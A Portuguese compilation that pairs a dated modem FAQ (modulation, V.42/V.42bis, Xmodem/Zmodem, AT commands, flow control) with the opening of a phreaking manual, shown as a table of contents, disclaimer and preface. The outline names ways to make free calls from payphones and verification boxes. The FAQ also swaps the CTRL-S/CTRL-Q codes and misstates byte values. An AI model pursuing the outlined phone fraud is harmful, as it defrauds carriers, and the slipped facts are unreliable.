V.32bis, V.42, V.42bis, MNP5, LAP-M, etc. O que cada uma significa?
O que que cada uma significa para você?

Para tirar o máximo de proveito de um modem de alta velocidade você
precisa entender três diferentes tipos de protocolos e suas relações.
São eles:

- Protocolos de modulação

- Protocolos de controle e correção de erros

- Protocolos de compressão de dados



I.[3.1] O que são os protocolos de modulação?

As técnicas específicas para modular os bits digitais em sinais
analógicos são chamadas de protocolos de modulação. Os vários
protocolos de modulação definem o método exato dessa codificação e
a velocidade da transferência resultante. Na realidade, você não pode
ter um modem sem protocolo de modulação. Um modem normalmente
suporta mais de um protocolo de modulação.

A velocidade crua (sem compressão de dados) de um modem é
determinada pelo protocolo de modulação. Este é negociado entre
dois modems na hora da conexão por envio e recepção de sinais
característicos (os famosos "beeeb-bbeebeebe-beebe" que se ouve na
hora da conexão). Modems de alta velocidade são modems que
suportam protocolos de modulação de 9600 bps ou acima (bps é a
abreviatura de "bits por segundo", ou seja, quantos bits podem ser
transferidos por segundo).



I.[3.1.1] Quais são os protocolos de modulação?



- até 2400 bps

Um modem de 2400 bps compatível com o Hayes normalmente
suporta os seguintes protocolos de modulação:

Bell 103 (padrão americano para 300 bps)

Bell 212A (padrão americano para 1200 bps)

ITU-T V.22 (padrão mundial para 1200 bps)

ITU-T V.22bis (padrão mundial para 2400 bps)

Alguns modems de 2400 bps também suportam os seguintes
protocolos:

ITU-T V.21 (padrão mundial para 300 bps)

ITU-T V.23 (padrão europeu para 1200/75 e 75/1200 bps.

Esse padrão é usado também pelo sistema de Video Texto no Brasil)

- acima de 2400 bps

Existem hoje três protocolos de modulação que são padrões mundiais
para modems de alta velocidade: V.32, V.32bis e V.34. Os dois
primeiros foram estabelecidos pela antiga CCITT e o último já pela
ITU-T.

- V.32
Esse é o padrão para modems de 9600 bps (e 4800 bps). V.32 foi
adotado como padrão pela CCITT em 1984. Mas o mercado para
esses modems demorou um pouco para crescer. Um modem com
V.32 custava por volta de US$ 2000 no ano de 1988. Atualmente
modems até esse protocolo (que não tenham nenhum protocolo para
velocidades superiores) estão praticamente obsoletos e não existem
em grandes quantidades no mercado. Nessa época surgiram alguns
outros protocolos que não eram padrão mundial, mas proprietários de
certas empresas fabricantes de modems, como a USRobotics, a
Telebit, a Hayes e CompuCom, que criaram os modems com o
chamado "dual standard" (padrão duplo) que suportavam tanto o V.32
e seu próprio padrão.

- V.32bis

V.32bis, estabelecido no começo de 1991 é o padrão da ITU-T para
modems a 14400 bps. Um modem com V.32bis possui também
capacidade de conectar a velocidades menores ("fall back"): 12000,
9600, 7200 e 4800 bps. No V.32bis está incluso o V.32.

Diferente da época dos modems de 2400 bps onde um só protocolo de
modulação (V.22bis) era suportado por todos os fabricantes de
modems, na época do V.32bis surgiram vários protocolos de
modulação proprietários (não aprovados pela ITU-T) criados por
fabricantes de modems. Os melhores exemplos são os protocolos
HST da USRobotics e o PEP da Telebit.

- V.34

Atualmente o protocolo de modulação mais veloz para modems.
Suporta conexões de até 28800 bps, com um "fall back" inteligente
para velocidades inferiores, caso a linha não tenha condições de
agüentar a alta velocidade de 28800 bps: 26400, 24000, 21600 e
19200 bps. Possui um método de negociação inteligente, que se
adapta à qualidade e condição da linha telefônica.



I.[3.1.2] Qual a diferença entre os protocolos V.FAST, V.34 e V.FC?

- V.FAST
V.FAST foi o "codinome" dado ao protocolo para comunicação a 28.8
kbps (kbps significa kilobits por segundo) antes dele ser discutido e
aprovado pela ITU-T. Ou seja, até junho de 1994 falava-se do
protocolo V.FAST, em desenvolvimento, até aparecer o nome
definitivo para o mesmo, que seria V.34. Ou seja, um é nome do
protocolo na fase de desenvolvimento, não ainda o nome oficial.
Muitos chamaram o V.FAST também de V.LAST, pois diziam que as
linhas telefônicas comuns não agüentariam mais que isso, por isso
seria o último (=LAST) dessa geração.

- V.FC

Existe ainda o V.FC, protocolo que o fabricante de chips para modems
Rockwell criou antes do V.34 ser regularizado pela ITU-T. É um
protocolo proprietário (não é padrão mundial da ITU-T) para
comunicação a 28.8 kbps e que teve muitos seguidores. Era a época
de desenvolvimento do V.34 (final de 1993) e a Rockwell achou que a
outorgação do mesmo estava demorando muito. Até a USRobotics a
seguiu e o implementou em seus

modems.

Até setembro de 1994 o padrão para 28.8 kbps era praticamente o
V.FC, pois o V.34 ainda não estava totalmente regularizado (já estava
aprovado pela ITU-T, mas ainda devia ser aprovado pelos países
membros da ITU por votação). Muitos fabricantes de modems de 28.8
kbps com o V.FC prometeram um upgrade (atualização) para o padrão
V.34 quando este estivesse regularizado. Alguns exigiriam troca de
hardware, outros upgrade via software.

Assim em setembro de 1994 o padrão V.34 foi finalmente aprovado
em definitivo, e começou a ser fabricado e usado mundialmente.

Hoje em dia um modem 28.8 kbps que não tenha o protocolo V.34
está praticamente obsoleto. Existem modems com os dois protocolos
V.34 e V.FC (caso do USR Courier 28.8 kbps dual standart), mas o
V.FC certamente cairá em desuso.



I.[3.2] O que e quais são os protocolos de correção de erros?
(V.42 e MNP 2-4)

Em transmissões a altas velocidades, não é raro que as chamadas
"sujeiras na linha" atrapalhem a conexão. Essas sujeiras nada mais
são do que conexões telefônicas "sujas", que evitam que o mesmo
som que um modem produziu seja recebido pelo outro, ou seja,
quando o lado que recebe for demodular o que chegou, não será o
que o outro lado transmitiu, o que é demonstrado na conexão com a
chamada "sujeira na tela". Em modems de baixa velocidade a
tolerância para sujeiras é maior, mas em alta velocidade, é necessária
uma precisão muito maior para resultados adequados.

E é por isso que foram desenvolvidos protocolos que cuidam de
monitorar a transferência de dados e que conseguem filtrar fora essa
sujeira, que se manifesta na conexão com caracteres aleatórios na
tela.

Os protocolos V.42 e MNP 2-4 cuidam da linha telefônica filtrando
essas sujeiras. Quando dois modems estabelecerem conexão usando
um protocolo de correção de erros, a conexão se dará de forma
totalmente limpa, sem erros na tela. Note que a sujeira na linha
continua presente, só que não transparece na conexão (na tela).

O processo de filtro usado pelo V.42 e MNP 2-4 é um esquema de
correção de erros baseado em algoritmos sofisticados para garantir
que os dados que chegam são os mesmos que foram enviados pelo
outro lado. Caso os dados não correspondam, o bloco é reenviado. É
por isso que algumas vezes a conexão a altas velocidades é
interrompida brevemente: É a correção de erros em ação.

O protocolo V.42 utiliza o LAP-M (Link Access Procedure for Modems)
como esquema primário de correção de erros e inclui o MNP 4 como
esquema secundário. Um modem com V.42 automaticamente possui
MNP 4, e é capaz de conectar com um modem dos dois tipos.

É portanto altamente recomendado deixar a correção de erros ativada
durante uma conexão.



I.[3.3] O que e quais são os protocolos de compressão de dados?
- V.42bis e MNP5

Estes protocolos permitem uma compactação de dados antes do
envio, e a descompactação do outro lado, tudo "on-the-fly", ou seja, ao
mesmo tempo em que está sendo enviado.

A utilização ou não desses protocolos é negociado na hora da
conexão e estes permanecem válidos até a posterior desconexão.

Com o protocolo V.42bis pode-se atingir uma compactação de até 4:1
(4 para 1) se o arquivo transmitido for altamente compactável. Neste
caso, a taxa de transferência em modems 14400 bps passaria dos
normais 1440 cps para até 5760 cps.

Como arquivos altamemte compactáveis entendem-se arquivos-texto,
planilhas, executáveis (não compactados), bancos de dados, etc.

- Diferenças entre V.42bis e MNP5

Mas o que acontece quando se transmite algum arquivo que já esteja
compactado? Um protocolo que tem que atuar "on-the-fly" logicamente
não conseguirá comprimir este arquivo mais ainda. Aí está a grande
diferença entre MNP5 e V.42bis: No MNP5, ele não percebe nada, e
tenta compactar mesmo assim, fazendo com que a transmissão seja
mais lenta do que o normal. Com o V.42bis, ele percebe que os dados
já estão compactados, e se auto-desativa. Com isso não se perde
nada em performance.

I.[3.4] O que são modems RPI e por que são mal vistos?

Normalmente os protocolos V.42 e V.42bis (correção de erros e
compressão de dados) são implementados via HARDWARE, ou seja,
o próprio modem se encarrega disso.

Mas existem certas marcas de modems onde isso não é o caso.
Quando você compra esse tipo de modem, pode pensar que ele
possue o V.42 e o V.42bis, o que normalmente é informado na caixa,
mas não repara no escrito "RPI MODEM", "RPI COMPILANT" ou algo
parecido.
RPI é a sigla de "Rockwell Protocol Interface" e basicamente significa
que o modem depende de que a correção e compressão sejam feitos
por algum software padrão RPI.

Esses modems normalmente vem com os seus softwares de
comunicação, que são justamente padrão RPI e que são capazes de
ativar esses protocolos e os usar. Mas assim que se deseje utilizar
outro tipo de programa de comunicação, não mais se pode utilizar o
V.42 e V.42bis do modem, pois a maioria deles não traz suporte para
RPI.

A diferença básica de um modem RPI para um não-RPI reside no fato
de ONDE o software dos protocolos V.42 e V.42bis são executados.
No caso dos modems não-RPI, isto é feito pelo próprio modem, no
caso dos modems RPI, isso deve ser feito pela CPU do computador.

Assim, além da desvantagem de falta de programas de comunicação,
tem-se ainda o fato de estar se gastando ciclos do processamento do
micro para a correção de erros, o que pode ser fatal em plataformas
de multi-tasking.



I.[3.5] O que são protocolos de transferência de arquivos?

Os modems que se comunicam entre si podem apenas passar BYTES
de um lado para o outro. Eles não têm noção sobre arquivos, etc. Para
que se possa transferir um arquivo, você deve utilizar um protocolo de
transferência de arquivos.

Um protocolo desse tipo é o que define como os bytes serão enviados
e interpretados pelo outro lado para formarem um arquivo exatamente
do mesmo tamanho e conteúdo do existente no lado que o enviou.

Um protocolo de transferência define a quantidade de bytes que serão
enviados em cada BLOCO, como serão tratados erros de transmissão,
como um erro é detectado e como o mesmo é corrigido, como um lado
fica sabendo o nome do arquivo que está sendo enviado, como é
informada a conclusão da transferência, quantidade de arquivos a
serem transmitidos, etc.
Um BLOCO é uma sucessão de bytes que são transmitidos sem
pausas. Os blocos de transferência em protocolos de transmissão
podem variar de 96 a 8192 bytes (8 kb). A cada final de bloco são
enviados bytes de controle, que podem servir simplesmente para
delimitar os blocos, como também para controle e correção de erro.

Existem muitos protocolos de transferência de arquivos à disposição,
alguns são mais rápidos, outros mais confiáveis, alguns com mais
recursos, outros com menos. O que importa é que para se utilizar um
protocolo de transferência de arquivos, da mesma forma que para os
protocolos de modulação, ambos os lados precisam ter este mesmo
protocolo à disposição.



I.[3.5.1] Quais protocolos de transferência existem?

Os protocolos mais comuns que são apresentados em programas de
comunicação são os famosos: Xmodem, Ymodem e Zmodem. Existem
ainda outros, que veremos mais tarde nessa mesma sessão.

- Xmodem

O protocolo Xmodem original foi desenvolvido em 1977 por um
programador chamado Ward Christensen. Através dele, os arquivos
são transmitidos em blocos de 128 bytes, aos quais sempre é
adicionado um byte de controle para verificação de erros. Esse byte
extra, chamado de SOMA DE VERIFICAÇAO, é composto pelos oito
bits de ordem inferior da soma dos 128 bytes. Assim o software
receptor calcula igualmente essa soma dos bytes que chegaram e
compara com a soma da verificação. Se a soma for outra, o receptor
requisita uma retransmissão do bloco.

- Xmodem-CRC

O protocolo Xmodem-CRC substituiu a verificação de soma por um
esquema chamado de verificação de redundância cíclica (CRC). Ela
tem a mesma finalidade que a soma de verificação, porém é mais
confiável.

- Xmodem-1k
Com os modems de alta velocidade, os blocos de 128 bytes se
tornaram muito pequenos. Com isso surgiu o protocolo Xmodem
usando blocos de 1024 bytes (1 kbyte).

Algumas vezes, o Xmodem-1k é também chamado de Ymodem. No
caso disso ocorrer, o Ymodem real é chamado de Ymodem-Batch.

- Ymodem

Basicamente ele é a mesma coisa que o protocolo Xmodem, com
algumas diferenças: Se a houver muita sujeira na linha, ele é capaz de
comutar automaticamente de blocos de 1024 para blocos de 128
bytes. Em blocos menores, é menos provável que ocorra algum erro e
a verificação é mais efetiva.

Além disso, os protocolos Ymodem utilizam um bloco de cabeçalho
especial no início da transferência, contendo o nome do arquivo,
simplificando a tarefa da transferência de arquivos em forma BATCH.

Tranferência batch significa nada mais do que transferir diversos
arquivos um atrás do outro, numa mesma sessão do protocolo de
transferência.

Muitas vezes o Ymodem é também chamado de Ymodem-Batch.

- Ymodem-G

Variante do Ymodem que simplesmente não realiza correção de erros
na transmissão dos arquivos. Ele confia na qualidade da linha, ou
então ele confia na correção de erros do seu modem, transmitindo os
dados seqüencialmente sem parar. Quando ocorrer um erro ele
imediatamente aborta a operação.

- Zmodem

É o protocolo mais usado atualmente. Apresenta basicamente os
recursos do Ymodem-Batch, com uma performance maior ainda,
blocos de 1024 bytes, transferência batch, e além disso o recursos de
CRASH RECOVERY, que possibilita que transferências abortadas no
meio possam ser prosseguidas mais tarde, a partir do local onde se
parou da vez anterior.
Até os programas de comunicação mais simples devem suportar esse
protocolo, pois é o mais normal de se usar.

- ZedZap

O mesmo protocolo Zmodem, com a diferença deste usar blocos de
8192 bytes ao invés dos habituais 1024.

Ele não está disponível em todos os programas de comunicação. Ele
se encontra por exemplo no Terminate.

- Protocolos Bidirecionais

Os protocolos abordados até agora só servem para transmitir em UMA
direção. Acontece que numa conexão normal de modems, existem
DOIS canais de transferência, como visto na figura da sessão [1.0].
Numa transferência unilateral, um dos canais fica sem uso ou é usado
somente para efeito de correção de erros. Por isso surgiram
protocolos BIDIRECIONAIS, que são capazes de transmitir arquivos
para ambos os lados ao mesmo tempo, sem perda de performance.

Exemplos são o HSLINK, Bimodem e o Hydracomm.

- ASCII

O protocolo ASCII é um protocolo de transferência em 7 bits que
fazem os 128 primeiros caracteres da tabela ASCII. Esse protocolo
não possui controle e correção de erros e usa o XON/XOFF (veja
depois) para controle de transmissão. Assim sendo, o XON/XOFF
precisa estar ligado neste caso. Quando o computador que receber os
dados precisa parar a transmissão temporariamente, ele envia um
CTRL-S (ASCII #17) para parar o envio. Quando ele estiver pronto
para voltar a receber dados, envia um CTRL-Q (ASCII #19) para
continuar a transmissão.

Esse protocolo não deve ser usado praticamente nunca, só para
enviar ou receber rapidamente textos que aparecerem no terminal.

- Kermit
Kermit é um protocolo que é usado extensivamente na Internet. É um
protocolo um tanto antigo, que possui uma vasta gama de opções mas
que normalmente não tem boa performance.

Ele usa tamanhos de pacotes variáveis, com um máximo de 1024
bytes.

Como o Ymodem, traz suporte para transferências batch.



I.[3.5.2] Quais são os melhores e os piores protocolos de transferência
de arquivos?

Em casos normais você deve usar o protocolo Zmodem. Ele é
adequado tanto para modems de alta velocidade quanto para modems
sem correção de erros.

Mas é um fato que o Ymodem-G é mais rápido que o Zmodem normal.
Só deve ser usado se seu modem faz correção de erros. Veja porque
ele é mais rápido:

O Zmodem manda blocos de 1024 bytes por vez. Após mandar um
bloco, ele ainda precisa fazer a comparação com o CRC do bloco que
foi enviado com o que chegou. Com isso, além do bloco em si, estão
sendo mandados bytes de frames (que indicam o começo e fim do
bloco) e blocos CRCs para correção de erros.

O Ymodem-G não faz correção de erros. Por isso ele não precisa
mandar os blocos CRC após cada bloco, o tornando ligeiramente mais
rápido.

Se o seu modem possuir correção de erros, você pode utilizar o
Ymodem-G para maior velocidade (a diferença é mínima). O que
então ocorre é que falta o recurso utilíssimo de crash recovery a ele.
Assim sendo, se uma transmissão com o Ymodem-G for abortada,
para continuar da posição onde se parou, deve-se utilizar o Zmodem.

Uma outra opção é o ZedZap. Enviando blocos de 8192 bytes de cada
vez, os frames e correção de erros são feitos para os blocos como um
todo, assim são menos dados adicionais que precisam ser enviados
na transferência de um arquivo. Acontece que se ocorrer alguma falha
na transmissão de um bloco, mesmo que já tenham chegado 8000
bytes corretos, o bloco inteiro precisa ser remandado, tornando a
transferência ainda mais demorada do que com o Zmodem (onde no
máximo 1024 bytes precisam ser reenviados). Se um modem possuir
correção de erros e ambos os lados tiverem o ZedZap à disposição,
este protocolo pode ser o indicado. Para modems SEM correção de
erros (os de 2400 bps, por exemplo), nunca se deve tentar utilizar
esse protocolo.

Resumindo, os protocolos que devem ter chances de serem usados
atualmente são o Zmodem, ZedZap (Zmodem 8Kb) e o Ymodem-G.

Se você possuir um modem com correção de erros confiável (você
NUNCA vê sujeira na tela), use o protocolo ZedZap se necessitar de
velocidade e do recurso de crash recovery ou o protocolo Ymodem-G
se necessitar de velocidade e não de crash recovery.

I.[4.0] O que são comandos? Como usá-los?

Para você se comunicar com o modem e dar-lhe instruções, você deve
usar os chamados COMANDOS AT. Comandos são certas instruções
que podem ser passados para o modem. Ele os interpretará
retornando a informação requisitada, ou a confirmação de correto
recebimento do comando ou de erro na sintaxe do mesmo ("OK" ou
"ERROR").



- O que é padrão Hayes?

Os comandos que podem ser usados nos modems variam de acordo
com o modelo e fabricante, mas normalmente seguem o chamado
PADRAO HAYES. Hayes é uma empresa fabricante de modems que
se tornou conhecida por ter modelos de modems que chegaram como
pioneiros no grande mercado, os modems Hayes Smartmodem 1200 e
2400. Nestes usavam-se certos comandos, e eles se tornaram quase
que um padrão para os modems futuros que viriam.

- Como enviar comandos ao modem?
Os comandos podem ser enviados ao modem, através de um
programa de comunicação, de um modo manual ou transparente ao
usuário (sem que ele precise digitá-los).

No primeiro caso, para enviar comandos manualmente para o modem,
deve-se estar em algum meio onde se esteja em direta comunicação
com ele. É o caso dos TERMINAIS dos programas de comunicação.
Normalmente são telas vazias, com o cursor piscando no canto
superior esquerdo. Qualquer coisa digitada ali será enviada e
interpretada diretamente pelo modem. Experimente digitar "AT" +
<ENTER>. O modem deve responder "OK", se ele estiver preparado e
operante.

No segundo caso, os comandos são enviados através de opções
existentes no programa de comunicação, como por exemplo através
da init string, dial string, etc.

Normalmente programas de comunicação oferecem uma configuração
chamada INIT STRING (= seqüência de inicialização). Ali devem ser
colocados comandos que devem ser enviados ao modem assim que
se entrar no programa de comunicação, é uma forma de configurar o
modem e prepará-lo para as conexões subseqüentes.

Outras configurações de programas de comunicação que fazem uso
dos comandos do modem normalmente são o DIAL STRING (=
comando para discagem) e HANGUP STRING (= comando para
desconectar o modem de uma ligação).

- Quais são os comandos mais comuns?

"AT" é o principal comando que deve ser enviado ao modem
praticamente sempre antes de um outro comando. Serve para chamar
a atenção do modem, informando-o que o que vem a seguir é uma
seqüência de comandos que ele deve interpretar.

Os manuais dos modems normalmente trazem uma lista dos
comandos possíveis para este determinado modelo. Alguns comandos
se tornaram padrão entre todos os modems, como:

"ATD" - Para tirar o modem "do gancho" e mandá-lo discar o número
que vier a seguir. Ex: "ATD884-2446". Veja também a sessão II.[6.0]
para maiores detalhes neste comando.

"ATZ" - Carrega a configuração previamente salva na memória do
modem.

"+++" - Quando você estiver conectado em algum lugar, não poderá
enviar comandos ao modem. Caracteres digitados serão somente
enviados ao outro lado da conexão. Para enviar comandos ao modem
enquanto conectado, deve-se esperar um segundo depois do
envio/recebimento do último byte, digitar "+++" e aguardar mais um
tempo. O modem deve responder com "OK" e você estará no modo de
comandos. Para depois voltar à conexão usa-se o "ATO". O problema
aqui é quando isso não funciona corretamente. Neste caso tenha
certeza que de, quando você enviou o "+++", não só o SEU modem foi
para o modo de comandos, mas também o modem do outro lado, pois
ele interpretou o "+++" da mesma forma. Para contornar o problema, a
maioria dos modems possibilita a troca do caracter de "+" por um outro
para simbolizar essa "seqüência de escape" (como é conhecida essa
seqüência "+++").

"ATA" - Tira o telefone do gancho e atende a chamada. Assim, quando
alguém ligar e o modem reconhecer os toques no telefone imprimindo
a string "RING" em seu terminal, digitando "ATA" seguido de
<ENTER> o modem atenderá a chamada a inicializará o procedimento
de conexão com o outro modem.

- Como fazer uma conexão de modems durante uma ligação VOZ?

Digamos que você ligou para alguém e está conversando com a
pessoa pelo telefone normal. Resolvem então efetuar uma conexão
entre os dois modems, mas sem perder esta conexão. Como fazer?

É bem simples, exige só um pouco de sincronismo:



- Uma ponta dá um "ATA<ENTER>" e desliga o telefone.

- A outra ponta dá um "ATX3D<ENTER>" e igualmente desliga o fone.
Assim que você digitar "ATA<ENTER>", o modem já terá assumido a
conexão, e você pode desligar o telefone imediatamente. O mesmo
vale para o "ATX3D<ENTER>". O ideal é ambos digitarem antes os
comandos "ATA" e "ATX3D" e fazer em uma contagem regressiva
para que ambos digitem o <ENTER> aproximadamente ao mesmo
tempo.




II. CONFIGURAÇÃO



Quando você precisa acertar as configurações de seu programa de
comunicação, podem surgir algumas dúvidas para alguns itens,
justamente pelo desconhecimento dos significados de cada opção.

1.0 Velocidade serial x Velocidade modem (DTE x DCE)

2.0 8N1, 7E1, etc

3.0 Flow control (RTS/CTS - Xon/Xoff)

4.0 Portas de comunicação

5.0 Terminais de comunicação

6.0 Dial String
II.[1.0] Velocidade serial x Velocidade modem (diferenças entre DTE e
DCE).

Uma opção na configuração do software de comunicação certamente
diz algo a respeito de velocidade. Normalmente faz referência a
Velocidade Serial, Baud Rate, Speed, etc. Um item relacionado a isso
é a opção Lock Port Speed ou simplesmente Lock Port. Veremos aqui
como deve ser setada cada opção.

Antes de mais nada, vejamos algumas definições. Devemos distingüir
dois tipos de velocidades presentes em uma conexão entre dois
modems.

1) Velocidade entre o SEU computador com o SEU modem, essa é a
chamada velocidade DTE (Data Terminal Equipment), e na verdade é
a velocidade de sua porta serial.

2) Velocidade entre o SEU modem e o modem onde você está
conectando, sendo esta velocidade chamada de DCE (Data
Communication Equipment). Esta é a velocidade efetiva que ocorre
pela linha telefônica.

O que aparece quando dois modems se conectam (CONNECT xxxx) é
a taxa DCE, que os modems negociaram (nos piipipiii’s) para ser o
protocolo de modulação desta conexão.

Já o que você ajusta no seu programa de comunicação NÃO é essa
taxa, já que ela é negociada pelos modems na hora da conexão, e não
é possível evitar que eles o façam (a menos que você diga isso
expressamente para seu modem). O que você ajusta é a DTE, ou
seja, a velocidade máxima com que a sua porta serial irá receber os
dados que chegam.

Ajustando a opção Lock Port Speed para NÃO, isso fará com que a
velocidade serial (DTE) seja sempre a mesma do que a velocidade
entre os modems pela linha telefônica (DCE). Ajustando essa opção
para SIM, fará com que a velocidade serial permaneça a mesma
independente do que o modem fizer. Na opção de velocidade serial,
deve-se então colocar um valor mais elevado para modems de alta
velocidade, como por exemplo 57600 bps em modems de 14400 bps.
- V.42 e MNP 4 ajudando na performance

Quando uma conexão é feita com V.42 ou MNP4, a transferência
ocorre de modo um pouco diferente do que seria a de enviar os bytes
em seqüência. Um byte tem 10 bits (1 start bit, 8 dados e 1 stop bit,
isso na configuração 8N1, o que na verdade quer dizer: 8 bits de
dados, sem bit de paridade e um start bit. Se um dos protocolos V.42
ou MNP4 estiver ativo numa conexão, o modems que envia transmite
apenas os 8 bits de dados, os dois restantes são adicionados pelo
modem que recebe, fazendo com que 20% dos dados (2 de 10 bits) a
menos tenham que ser enviados.

Quando o modem que recebe adicionar esses 2 bits, eles tem que ser
transmitidos junto com os 8 restantes através da porta serial, e o
modem já se preparar para receber os novos bits que estiverem
chegando. Pra isso, o modem tem que mandar os 10 bits na mesma
velocidade que chegaram os 8 bits pela linha telefônica, para a porta
serial. A 14400 bps (bits por segundo) 8 bits chegaram em 1/1800
segundos. Nesse mesmo tempo 10 bits tem que ser mandados pela
porta serial, isso dá uma taxa de 18000 bps (bits por segundo) que a
porta serial tem que suportar.

Por isso na maioria dos programas de comunicação nem aparece a
opção de 14400 bps como velocidade serial, a próxima depois dos
9600 bps normalmente é 19200 bps, que seria o ideal para o caso das
conexões com o V.42 ou MNP 4.

- V.42bis e MNP 5 aumentando ainda mais a performance

Quando um protocolo de compressão de dados on-the-fly (V.42bis ou
MNP5) está ativo e se recebe arquivos não compactados, o modem
que envia vai conseguir compactar esses dados e assim ter que enviar
bem menos bytes. Vejamos um exemplo do que ocorre neste caso:

Um arquivo TEST.TXT tem 3072 bytes de tamanho. O protocolo
V.42bis consegue compactar ele digamos para somente 1024 bytes,
ou seja, compactação no fator 3:1.
Esses 1024 bytes são então enviados pelo modem pela linha
telefônica. Assim, se a conexão for de 14400 bps, transmitindo pela
linha telefônica a 1600 bytes por segundo (cps), esses 1024 bytes
chegam do outro lado em 0.64 segundos (o cálculo é uma simples
regra de três).

Mas esses mesmos 1024 bytes serão descompactados por sua vez
pelo modem que recebe, para os 3072 bytes originais que por sua vez
são transmitidos do modem pela entrada serial para o computador
(lembre-se que existe a ligação modem-modem e modem-serial, DTE
e DCE).

Assim, em 0.64 segundos, 3072 bytes (24576 bits) tem que ser
enviados do modem para o computador pela entrada serial. Isso quer
dizer que a taxa real entre o modem e a serial é de 38400 bps (bits por
segundo) e isso tem que ser suportado pela linha serial.

Por isso é ideal setar a velocidade serial para o maior possível.

Uma placa serial normalmente não agüenta mais de 57600 bps, por
isso essa deve ser a opção preferencial.



II.[2.0] O que é 8N1 e 7E1?

Outra configuração que se deve ajustar em praticamente todos os
programas de comunicação são esses valores estranhos. Eles
simbolizam como será a troca de bytes pela linha telefônica, como
interpretar os bits que chegam e que vão.

8N1 significa 8 databits, parity NONE e 1 stop bit. Traduzindo para
uma linguagem mais clara, quer dizer que um byte transmitido terá o
formato:

-----------------------------------------------------------------------

¦ 1 ¦ 2 ¦ 3 ¦ 4 ¦ 5 ¦ 6 ¦ 7 ¦ 8 ¦ 9 ¦ 10 ¦

|----------------------------------------------------------------------¦
¦start ¦ 8 databits ¦ stop ¦

-----------------------------------------------------------------------

O primeiro bit é sempre "0" e é interpretado como um bit de início do
byte. Os 8 seguintes são o byte propriamente dito, seguido pelo stop
bit que é sempre "1".

Com esses 8 bits de dados, forma-se um byte que conhecemos, o que
aceita valores de 1 a 256.

O formato 7E1 simboliza 7 data bits, EVEN parity e 1 stop bit.

---------------------------------------------------------------------

¦ 1 ¦ 2 ¦ 3 ¦ 4 ¦ 5 ¦ 6 ¦ 7 ¦ 8 ¦ 9 ¦ 10 ¦

|--------------------------------------------------------------------¦

¦start ¦ 7 databits ¦ par ¦stop ¦

---------------------------------------------------------------------

Um start bit ("0"), 7 bits de dados, podendo representar 128 valores,
um bit de paridade e um stop bit ("1").

O bit de paridade EVEN é um bit de controle. Ele é simplesmente o um
valor (1 ou 0) para que a soma dos bits "1" dos dados mais o bit de
paridade dê um número par (even). Por exemplo se os databits forem
"0110011", o bit de paridade é ajustado para "0", pois já existem 4 "1"
nos dados. Se os databits fossem "1110011", o bit de paridade seria
ajustado para "1", para chegarem a 6 (=par) bits com valor "1".

A paridade ODD é justamente o inverso, a soma dos bits "1" deve dar
um número impar.

Na paridade tipo Mark, o bit de paridade é sempre "1" e na paridade
tipo Space, este bit é sempre "0".

- Qual usar?
Para conexões com BBSs comuns, use sempre a configuração 8N1.
Ela é usada em 90% dos casos atualmente. Por exemplo para
conexões com a Compuserve, deve-se ajustar a configuração para
7E1.



II.[3.0] Como configurar o flow control (RTS/CTS - Xon/Xoff)?

Uma configuração importante para a transmissão de dados é o FLOW
CONTROL.

Flow control é um método de controlar quando informação pode ser
enviada. Se isso não fosse possível de se controlar, o modem poderia
ficar sobrecarregado de informações que estivessem chegando
enquanto ele está ocupado com outra coisa.

Um método é o SOFTWARE FLOW CONTROL, ou XON/XOFF, onde
um BBS irá mandar dados até que o seu computador envie um sinal
de XOFF (que é o caracter ASCII #17 - CTRL-S). Enviando um XON
(caracter ASCII #19 - CTRL-Q), ele voltará a transmitir.

Outro método é o HARDWARE FLOW CONTROL ou CTS/RTS. Este
caso funciona alterando-se voltagens em dois níveis nos pinos de RTS
(Request To Send) e CTS (Clear To Send) da interface serial entre o
modem e o computador (normalmente um cabo RS232).

CTS é usado pelo modem que está enviando dados. Quando o
modem local está pronto para receber dados, ele envia um sinal CTS
para o computador local, e este começa a mandar os dados para o
modem. Quando o modem não está mais conseguindo receber os
dados na velocidade com que o computador os está enviando, o
modem irá desligar o CTS, informando ao computador que é para ele
parar de enviar. Uma vez o modem está novamente em condições de
receber dados, ele novamente liga o CTS.

RTS é usado pelo computador do lado que está recebendo dados.
Quando o computador local não consegue receber dados na
velocidade que eles estão sendo enviados para ele pelo modem local,
ele irá desabilitar o RTS. O computador liga o RTS novamente quando
está pronto para receber dados novamente.
- Qual usar?

Escolha sempre preferencialmente o HARDWARE FLOW CONTROL
(CTS/RTS). O uso do XON e XOFF durante a transmissão de dados
por causar problemas quando um arquivo binário conter os caracteres
XON e XOFF. Neste caso a transmissão pode travar durante a
transferência de arquivos.

---



Manual Definitivo de Violação a
Telefones Públicos e Privados Versão 1.1

Índice
0 - Aviso

1 - Introdução

1.1 - Prefácio da versão 1.1

1.2 - Pobreza de informações e pessoas mal informadas

1.3 - Conceitos básicos a respeito de telefonia


2 - Telefones privados

2.1 - Introdução

2.2 - Efetuando ligações de aparelhos sem teclas


3 - Telefones públicos

3.1 - Introdução

3.2 - Efetuando ligações gratuitamente utilizando um diodo
3.3 - Efetuando ligações gratuitamente utilizando um aparelho comum

3.4 - Conectando notebooks a telefones públicos

3.5 - Observação


4 - Caixas de verificação

4.1 - Introdução

4.2 - Efetuando ligações gratuitas de caixas de verificação


5 - Pequena FAQ sobre telefonia

5.1 - É possível tomar um choque mexendo em fios telefônicos?

5.2 - Como faço para fazer chamadas grátis de minha residência?

5.3 - O que é o BINA?

5.4 - Existe alguma maneira de se bloquear o BINA?

5.5 - As famosas "boxes" funcionam aqui no Brasil?


6 - O Autor

6.1 - PGP Key

6.2 - Agradecimentos

6.3 - Como contatar o autor


--------------------------------------------------------------------------------

Aviso
Antes, aquele chavão de sempre: todos os procedimentos descritos
nesse documento são ilegais e podem levar o infrator a cumprir penas
de prisão e/ou pagamento de multas.

Vale lembrar também que eu sou contra qualquer tipo de vandalismo,
e que todo o processo aqui descrito não causa nenhum tipo de dano
aos aparelhos telefônicos. Mesmo a longo prazo.

O cidadão idiota que copiar este documento, totalmente ou em parte,
sem avisar o autor, não passará de um lamer de primeira que não faz
porra nenhuma e tenta enganar os outros mas consegue enganar a si
mesmo.

Esse texto poderá ser mencionado em outros documentos, desde que
conste nesses de onde ele foi retirado e quem o escreveu (no caso, eu
:-))


--------------------------------------------------------------------------------

Seção 1 - Introdução

--------------------------------------------------------------------------------

1.1 - Prefácio da versão 1.1
Depois de ter editado a primeira versão deste manual, recebi dezenas
de mensagens, principalmente do pessoal do BHC (Brazilian Hackers
Club), com várias perguntas. Algumas se tornaram adendos e
complemento para as seções e outras eu levei para uma Mini-FAQ,
que está localizada na seção 5.

1.2 - Pobreza de informações e pessoas mal informadas
